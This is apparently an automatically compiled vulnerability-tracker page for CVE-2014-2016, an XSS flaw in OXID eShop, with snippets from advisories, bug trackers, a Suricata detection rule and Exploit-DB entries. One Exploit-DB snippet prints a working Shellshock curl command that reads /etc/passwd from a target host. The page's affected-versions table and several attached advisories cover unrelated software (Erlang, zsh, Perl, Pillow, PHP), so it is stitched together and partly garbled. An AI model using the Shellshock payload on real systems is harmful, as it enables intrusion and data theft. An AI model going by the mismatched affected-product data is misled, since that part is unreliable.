CVE-2014-2016
published 2014-03-25CVE-2014-2016: Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4.6.8 and earlier, 4.7.x before 4.7.11, and 4.8.x before…
PriorityP420medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.47%
70.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4.6.8 and earlier, 4.7.x before 4.7.11, and 4.8.x before 4.8.4, and Enterprise Edition 4.6.8 and earlier, 5.0.x before 5.0.11 and 5.1.x before 5.1.4 allow remote attackers to inject arbitrary web script or HTML via the searchtag parameter to the getTag function in (1) application/controllers/details.php or (2) application/controllers/tag.php.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| erlang | erlang_otp | >= 0 < 1:16.b.3-dfsg-1ubuntu2.2 | 1:16.b.3-dfsg-1ubuntu2.2 |
| erlang | erlang_otp | >= 0 < 1:18.3-dfsg-1ubuntu3.1 | 1:18.3-dfsg-1ubuntu3.1 |
| node-bsdiff-android_project | node-bsdiff-android | 0 – 0.1.5 | — |
| oxid-esales | eshop | <= 4.6.8 | — |
| oxid-esales | eshop | >= 4.7.0 < 4.7.11 | 4.7.11 |
| oxid-esales | eshop | >= 4.8.0 < 4.8.4 | 4.8.4 |
| oxid-esales | eshop | >= 5.0.0 < 5.0.11 | 5.0.11 |
| oxid-esales | eshop | >= 5.1.0 < 5.1.4 | 5.1.4 |
| perl | perl | >= 0 < 5.18.2-2ubuntu1.1 | 5.18.2-2ubuntu1.1 |
| php5 | php5 | >= 0 < 5.5.9+dfsg-1ubuntu4.16 | 5.5.9+dfsg-1ubuntu4.16 |
| python | pillow | >= 0 < 2.3.0-1ubuntu3.4 | 2.3.0-1ubuntu3.4 |
| python | pillow | >= 0 < 3.1.2-0ubuntu1.1 | 3.1.2-0ubuntu1.1 |
| zsh | zsh | >= 0 < 5.0.2-3ubuntu6.1 | 5.0.2-3ubuntu6.1 |
| zsh | zsh | >= 0 < 5.1.1-1ubuntu2.1 | 5.1.1-1ubuntu2.1 |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
osv7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Oxid-esales eShop up to 5.1.3 getTag searchtag cross site scripting (EDB-32375 / SA57438)
vuldb·2026-05-09·CVSS 4.3
CVE-2014-2016 [MEDIUM] Oxid-esales eShop up to 5.1.3 getTag searchtag cross site scripting (EDB-32375 / SA57438)
A vulnerability classified as problematic was found in Oxid-esales eShop. Affected is the function getTag. The manipulation of the argument searchtag results in cross site scripting.
This vulnerability is known as CVE-2014-2016. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-vq4f-r8pc-6pf3: Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4
ghsa_unreviewed·2022-05-14
CVE-2014-2016 [MEDIUM] CWE-79 GHSA-vq4f-r8pc-6pf3: Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4
Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4.6.8 and earlier, 4.7.x before 4.7.11, and 4.8.x before 4.8.4, and Enterprise Edition 4.6.8 and earlier, 5.0.x before 5.0.11 and 5.1.x before 5.1.4 allow remote attackers to inject arbitrary web script or HTML via the searchtag parameter to the getTag function in (1) application/controllers/details.php or (2) application/controllers/tag.php.
GHSA
Downloads Resources over HTTP in node-bsdiff-android
ghsa·2018-09-18
CVE-2016-10641 [HIGH] CWE-269 Downloads Resources over HTTP in node-bsdiff-android
Downloads Resources over HTTP in node-bsdiff-android
Affected versions of `node-bsdiff-android` insecurely download resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.
## Recommendation
No patch is currently available for this vulnerability, and the package has not seen an update since 2014.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring th
OSV
zsh vulnerabilities
osv·2018-03-08·CVSS 7.8
CVE-2014-10070 zsh vulnerabilities
zsh vulnerabilities
It was discovered that Zsh incorrectly handled certain enviroment variables.
An attacker could possibly use this issue to gain privileged access to the
system. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-10070)
It was discovered that Zsh incorrectly handled certain inputs.
An attacker could possibly use this to execute arbitrary code. This
issue only affected Ubuntu 14.04 LTS. (CVE-2014-10071)
It was discovered that Zsh incorrectly handled some symbolic links.
An attacker could possibly use this to execute arbitrary code. This issue
only affected Ubuntu 14.04 LTS. (CVE-2014-10072)
It was discovered that Zsh incorrectly handled certain errors. An attacker
could possibly use this issue to cause a denial of service. (CVE-2016-10714)
It was discovered that Zsh
OSV
erlang vulnerabilities
osv·2018-02-14·CVSS 7.5
CVE-2014-1693 erlang vulnerabilities
erlang vulnerabilities
It was discovered that the Erlang FTP module incorrectly handled certain
CRLF sequences. A remote attacker could possibly use this issue to inject
arbitrary FTP commands. This issue only affected Ubuntu 14.04 LTS.
(CVE-2014-1693)
It was discovered that Erlang incorrectly checked CBC padding bytes. A
remote attacker could possibly use this issue to perform a padding oracle
attack and decrypt traffic. This issue only affected Ubuntu 14.04 LTS.
(CVE-2015-2774)
It was discovered that Erlang incorrectly handled certain regular
expressions. A remote attacker could possibly use this issue to cause
Erlang to crash, resulting in a denial of service, or execute arbitrary
code. This issue only affected Ubuntu 16.04 LTS. (CVE-2016-10253)
Hanno Böck, Juraj Somorovsky and Crai
OSV
pillow vulnerabilities
osv·2017-03-13·CVSS 5.0
CVE-2014-9601 pillow vulnerabilities
pillow vulnerabilities
It was discovered that Pillow incorrectly handled certain compressed text
chunks in PNG images. A remote attacker could possibly use this issue to
cause Pillow to crash, resulting in a denial of service. This issue only
affected Ubuntu 14.04 LTS. (CVE-2014-9601)
Cris Neckar discovered that Pillow incorrectly handled certain malformed
images. A remote attacker could use this issue to cause Pillow to crash,
resulting in a denial of service, or possibly obtain sensitive information.
(CVE-2016-9189)
Cris Neckar discovered that Pillow incorrectly handled certain malformed
images. A remote attacker could use this issue to cause Pillow to crash,
resulting in a denial of service, or possibly execute arbitrary code.
(CVE-2016-9190)
OSV
php5 vulnerabilities
osv·2016-04-21·CVSS 4.3
CVE-2014-9767 php5 vulnerabilities
php5 vulnerabilities
It was discovered that the PHP Zip extension incorrectly handled
directories when processing certain zip files. A remote attacker could
possibly use this issue to create arbitrary directories. (CVE-2014-9767)
It was discovered that the PHP Soap client incorrectly validated data
types. A remote attacker could use this issue to cause PHP to crash,
resulting in a denial of service, or possibly execute arbitrary code.
(CVE-2015-8835, CVE-2016-3185)
It was discovered that the PHP MySQL native driver incorrectly handled TLS
connections to MySQL databases. A machine-in-the-middle attacker could possibly
use this issue to downgrade and snoop on TLS connections. This
vulnerability is known as BACKRONYM. (CVE-2015-8838)
It was discovered that PHP incorrectly handled the imag
OSV
perl vulnerabilities
osv·2016-03-02·CVSS 7.5
CVE-2013-7422 perl vulnerabilities
perl vulnerabilities
It was discovered that Perl incorrectly handled certain regular expressions
with an invalid backreference. An attacker could use this issue to cause
Perl to crash, resulting in a denial of service, or possibly execute
arbitrary code. (CVE-2013-7422)
Markus Vervier discovered that Perl incorrectly handled nesting in the
Data::Dumper module. An attacker could use this issue to cause Perl to
consume memory and crash, resulting in a denial of service. (CVE-2014-4330)
Stephane Chazelas discovered that Perl incorrectly handled duplicate
environment variables. An attacker could possibly use this issue to bypass
the taint protection mechanism. (CVE-2016-2381)
Suricata
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
suricata·2016-09-01·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1"; flow:established,to_client; file.data; content:"|26 63 68 72 77 28 32 31 37 36 29 26 63 68 72 77 28 30 31 29 26|"; nocase; content:"|26 63 68 72 77 28 33 32 37 36 37 29|"; nocase; content:"|73 65 74 6e 6f 74 73 61 66 65 6d 6f 64 65 28 29|"; nocase; content:"|72 75 6e 73 68 65 6c 6c 63 6f 64 65 28 29|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023145; rev:3; metadata:affected_product Internet_Explorer, attack_target Client_Endpoint, created_at 2016_09_01, cve CVE_2014_6332, deployment Perimeter, malware_family IEiExploit, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, upd
Exploit-DB
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)
exploitdb·2016-06-06
CVE-2014-6278 Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)
---
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: [email protected]
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution
exploitdb·2016-05-26·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As is provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes and unauthenticated encrypted communication channel to
# a Data Protector Agent and
Exploit-DB
OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
exploitdb·2014-03-20·CVSS 4.3
CVE-2014-2017 [MEDIUM] OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
---
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: [email protected]
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on
Bugzilla
CVE-2014-9911 icu: stack-based buffer overflow in uloc_getDisplayName
bugzilla·2016-10-11·CVSS 9.8
CVE-2014-9911 [CRITICAL] CVE-2014-9911 icu: stack-based buffer overflow in uloc_getDisplayName
CVE-2014-9911 icu: stack-based buffer overflow in uloc_getDisplayName
A locale string of more than 255 characters passed to uloc_getDisplayName() could overflow a buffer on the stack, leading a crash or, potentially, code execution.
Upstream patch:
http://bugs.icu-project.org/trac/changeset/35699
Upstream issue (private as at 2016-10-11):
http://bugs.icu-project.org/trac/ticket/10891
Discussion:
PHP bug (already fixed in bug 1065838):
https://bugs.php.net/bug.php?id=67397
Related ICU bug:
http://bugs.icu-project.org/trac/ticket/11936
---
Created mingw-icu tracking bugs for this issue:
Affects: fedora-all [bug 1397625]
Affects: epel-7 [bug 1397626]
---
The affected function has only one buffer on the stack, and it is overflowed at the end by copying a null-terminated string w
Bugzilla
CVE-2012-6703 kernel: Integer overflow in compress_core
bugzilla·2016-06-29·CVSS 7.8
CVE-2012-6703 [HIGH] CVE-2012-6703 kernel: Integer overflow in compress_core
CVE-2012-6703 kernel: Integer overflow in compress_core
An integer overflow was found in snd_compr_allocate_buffer(), that could result into allocating smaller buffer than expected.
Upstream patch:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b35cc8225845112a616e3a2266d2fde5ab13d3ab
The patch was incomplete and introduced another issues known as CVE-2014-9904.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/616
Bugzilla
CVE-2014-9832 ImageMagick: heap overflow in pcx file
bugzilla·2016-06-07·CVSS 7.8
CVE-2014-9832 [HIGH] CVE-2014-9832 ImageMagick: heap overflow in pcx file
CVE-2014-9832 ImageMagick: heap overflow in pcx file
Fix heap overflow in pcx file.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=c264f9c466f22736c9fd9f8a7051f6b71ecb2c0d
Bugzilla
CVE-2014-9830 ImageMagick: handling of corrupted sun file
bugzilla·2016-06-07·CVSS 8.8
CVE-2014-9830 [HIGH] CVE-2014-9830 ImageMagick: handling of corrupted sun file
CVE-2014-9830 ImageMagick: handling of corrupted sun file
Fix handling of corrupted sun file.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=b68b78e2625122d9f6b6d88ba4df7e85b47b556f
Bugzilla
CVE-2014-9845 ImageMagick: crash due to corrupted dib file
bugzilla·2016-06-07·CVSS 5.5
CVE-2014-9845 [MEDIUM] CVE-2014-9845 ImageMagick: crash due to corrupted dib file
CVE-2014-9845 ImageMagick: crash due to corrupted dib file
Fix crash due to corrupted dib file.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=a7a7fd3ce95b7b8efb0ce1ce40f43dbbd20d8e03
Bugzilla
CVE-2014-9819 ImageMagick: heap overflow in palm files
bugzilla·2016-06-07·CVSS 7.8
CVE-2014-9819 [HIGH] CVE-2014-9819 ImageMagick: heap overflow in palm files
CVE-2014-9819 ImageMagick: heap overflow in palm files
Avoid heap overflow in palm files.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=0a89a1ccca6e7ee059b73f5cc924513383e8a330
Bugzilla
CVE-2014-7913 dhcpcd: Misinterpreted return value of snprintf function
bugzilla·2016-05-10·CVSS 6.8
CVE-2014-7913 [MEDIUM] CVE-2014-7913 dhcpcd: Misinterpreted return value of snprintf function
CVE-2014-7913 dhcpcd: Misinterpreted return value of snprintf function
The print_option function in dhcp-common.c in dhcpcd through 6.9.1 misinterprets the return value of the snprintf function, which allows remote DHCP servers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted message.
Patch:
https://android.googlesource.com/platform/external/dhcpcd/+/73c09dd8067250734511d955d8f792b41c7213f0
Upstream release fixing the issue:
http://roy.marples.name/archives/dhcpcd-discuss/2016/1244.html
External references:
(none)
Discussion:
Created dhcpcd tracking bugs for this issue:
Affects: fedora-23 [bug 1334635]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially support
Bugzilla
CVE-2016-3947 squid: buffer overrun in Squid proxy pinger
bugzilla·2016-04-04·CVSS 6.4
CVE-2016-3947 [MEDIUM] CVE-2016-3947 squid: buffer overrun in Squid proxy pinger
CVE-2016-3947 squid: buffer overrun in Squid proxy pinger
A buffer overrun (on write(2)) has been found in Squid proxy 'pinger'
process that allows an attacker to craft ICMPv6 messages that will
either crash the child process (if the OS protects against over-write)
or alter heap contents allowing the attacker to bypass CVE-2014-7142
protection and leak arbitrary heap data into the Squid log files. The
pinger is setuid root (though it does drop those privileges prior to
this attack being possible).
Upstream fix:
http://www.squid-cache.org/Versions/v3/3.5/changesets/squid-3.5-14015.patch
External references:
http://www.squid-cache.org/Advisories/SQUID-2016_3.txt
References:
http://seclists.org/oss-sec/2016/q2/2
Discussion:
Created squid tracking bugs for this issue:
Affects: fedora
Talos
Vulnerability Spotlight - LibBPG Image Decoding Code Execution
blogs_talos·2017-01-23·CVSS 7.8
CVE-2016-8710 [HIGH] Vulnerability Spotlight - LibBPG Image Decoding Code Execution
Discovered by Cisco Talos
### Overview
Talos is disclosing TALOS-2016-0223 / CVE-2016-8710. An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be triggered via attempting to decode a crafted BPG image using libbpg.
### Details
BPG (Better Portable Graphics) is an image format created in 2014 based on the HECV video compression standard. BPG has been praised for its ability to produce the same quality image as the well known JPEG format, but in a much smaller file size. Talos is disclosing the presence of a remote code execution vulnerability in the libbpg
Talos
Vulnerability Spotlight - LibBPG Image Decoding Code Execution
blogs_talos·2017-01-23·CVSS 7.8
CVE-2016-8710 [HIGH] Vulnerability Spotlight - LibBPG Image Decoding Code Execution
## Vulnerability Spotlight - LibBPG Image Decoding Code Execution
Discovered by Cisco Talos
## Overview
Talos is disclosing TALOS-2016-0223 / CVE-2016-8710. An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be triggered via attempting to decode a crafted BPG image using libbpg.
## Details
BPG (Better Portable Graphics) is an image format created in 2014 based on the HECV video compression standard. BPG has been praised for its ability to produce the same quality image as the well known JPEG format, but in a much smaller file size. Talos is disclosing th
2014-03-25
Published